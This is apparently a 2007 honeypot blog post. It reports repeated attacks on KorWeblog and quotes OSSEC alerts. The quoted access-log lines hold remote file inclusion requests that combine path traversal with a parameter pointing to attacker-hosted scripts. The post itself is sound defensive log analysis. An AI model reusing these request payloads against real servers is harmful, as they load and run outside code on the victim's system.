Hammered by web attacks (KorWeblog)

Some of my web honeypots are being hammered by attacks against KorWeblog. If fact, even my real systems are received a lot of these too.. It looks like they are trying to exploit an old vulnerability (from 2005), which sounds odd to me.

Example of alert from ossec:

OSSEC HIDS Notification.
2007 Jun 27 17:07:30

Received From: xx->/var/log/httpd/xx.access.log
Rule: 31106 fired (level 12) -> “A web attack returned code 200 (success).”
Portion of the log(s): – - [27/Jun/2007:17:07:29 -0300] “GET /install/index.php?lng=../../include/main.inc&G_PATH=http://nicksom2d.sytes.net/ex/echo? HTTP/1.1″ 200 6349 “-” “libwww-perl/5.805″

Just one honeypot (yes, one) in the last few days was “attacked” by the following IPs (25 different):

The logs look all the same: – - [26/Jun/2007:16:37:37 -0300] “GET /*install/index.php?lng=../../include/main.inc&G_PATH=http://www.thiaguinho.net/id.txt? HTTP/1.1″ 200 6351 “-” “libwww-perl/5.79″ – - [27/Jun/2007:17:07:29 -0300] “GET /install/index.php?lng=../../include/main.inc&G_PATH=http://nicksom2d.sytes.net/ex/echo? HTTP/1.1″ 200 6349 “-” “libwww-perl/5.805″

I posted a few of the sites that were found at the WebAttacks Links in the ossec wiki.

This entry was posted in log analysis, webattacks. Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>